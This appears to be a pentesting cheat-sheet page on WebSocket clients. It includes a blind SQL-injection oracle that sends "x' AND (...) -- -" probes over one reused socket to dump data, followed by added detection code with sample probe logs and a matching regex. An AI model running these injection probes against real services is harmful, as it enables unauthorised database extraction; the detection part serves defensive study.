WebSockets

Synchronous and asyncio WebSocket clients, and a blind oracle that drives extraction over a single socket.

WebSocket client — sync (websocket-client)

GAP filler. Synchronous API, the easiest to script. Authentication is passed through Cookie/Origin headers on the handshake, just as with requests.

import websocket   # pip install websocket-client

# header= takes raw "Name: value" strings; they are sent with the HTTP upgrade handshake
ws = websocket.create_connection(
    "ws://TARGET/socket",
    header=["Cookie: session=ABC", "Origin: http://TARGET"]
)
ws.send('{"action":"login","username":"admin","password":"x"}')
print(ws.recv())   # blocks until one frame arrives
ws.close()

Find by: websocket, ws, websocket-client, create_connection, send, recv, realtime, socket, gap, cookie, origin, headers

WebSocket client — asyncio (websockets)

The asyncio-based library; better suited to interleaved send/recv or many concurrent sockets.

import asyncio, websockets   # pip install websockets

async def main():
    # extra_headers= is the legacy-client name; websockets >= 14 (new asyncio client)
    # renamed it to additional_headers=
    async with websockets.connect("ws://TARGET/ws",
                                   extra_headers={"Cookie": "session=ABC"}) as ws:
        await ws.send("ping")
        print(await ws.recv())

asyncio.run(main())

Find by: websocket, ws, websockets, asyncio, async, await, connect, send, recv, gap, coroutine, stream

WebSocket blind oracle (reuse one socket)

This oracle plugs into the blind-dump harness to run SQLi/NoSQLi over a WebSocket sink. Keeping the socket open avoids a fresh handshake per probe, which is what makes the extraction fast.

import websocket, json

# one handshake for the whole run; every probe is a frame on this same socket
ws = websocket.create_connection("ws://TARGET/socket")

def oracle(condition):
    ws.send(json.dumps({"search": f"x' AND ({condition}) -- -"}))
    resp = ws.recv()                    # server reply for this probe
    return "No results" not in resp     # True => condition held

# from blind-harness:  blind_dump(oracle, len_cond, char_cond)

Find by: websocket, ws, blind, oracle, injection over websocket, boolean, extract, dump, keep alive, gap, persistent connection
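Added detection example, not part of the original page: the oracle above produces a burst of boolean probes on one long-lived socket, and that footprint can be searched for in a server-side log of inbound WebSocket frames. The log records, the `search` field, the regex and the thresholds are constructed assumptions.

```python
import json
import re
from collections import defaultdict

# Constructed sample of server-side WebSocket frame logs (not from the original page):
# one record per inbound text frame as (connection_id, unix_time, payload).
SAMPLE_LOG = [
    ("conn-A", 100.0, '{"search": "laptop"}'),
    ("conn-A", 105.2, '{"search": "laptop bag"}'),
    ("conn-B", 200.0, '{"search": "x\' AND (LENGTH(database())>8) -- -"}'),
    ("conn-B", 200.1, '{"search": "x\' AND (LENGTH(database())>12) -- -"}'),
    ("conn-B", 200.2, '{"search": "x\' AND (ASCII(SUBSTRING(database(),1,1))>77) -- -"}'),
    ("conn-B", 200.3, '{"search": "x\' AND (ASCII(SUBSTRING(database(),1,1))>109) -- -"}'),
    ("conn-B", 200.4, '{"search": "x\' AND (ASCII(SUBSTRING(database(),2,1))>77) -- -"}'),
    ("conn-C", 300.0, "ping"),
]

# Assumed signatures of boolean probing inside a field value (case-insensitive):
# a quote followed by AND/OR and an opening paren, the "-- -" comment terminator,
# or the character/length functions a blind dump relies on.
PROBE_RE = re.compile(r"""(?ix)
      ['"]\s*(?:and|or)\s*\(
    | --\s*-
    | \b(?:substring|substr|mid|ascii|length)\s*\(
""")

def is_probe(payload: str) -> bool:
    """True if any string value in the frame (JSON object or raw text) looks like a probe."""
    try:
        values = [v for v in json.loads(payload).values() if isinstance(v, str)]
    except (ValueError, AttributeError):   # not JSON, or JSON that is not an object
        values = [payload]
    return any(PROBE_RE.search(v) for v in values)

def flag_oracle_probing(log, min_hits=4, window_s=10.0):
    """Return connection ids that sent at least min_hits probe-like frames within
    window_s seconds on one socket: the footprint of an oracle reusing a connection."""
    hits = defaultdict(list)
    for conn_id, ts, payload in log:
        if is_probe(payload):
            hits[conn_id].append(ts)
    flagged = set()
    for conn_id, times in hits.items():
        times.sort()
        # sliding window: any min_hits consecutive probes inside window_s flags the socket
        if any(times[i + min_hits - 1] - times[i] <= window_s
               for i in range(len(times) - min_hits + 1)):
            flagged.add(conn_id)
    return flagged
```

Per-connection counting is the point: the same probes spread over many short-lived sockets would need a per-client-IP or per-session key instead of the connection id.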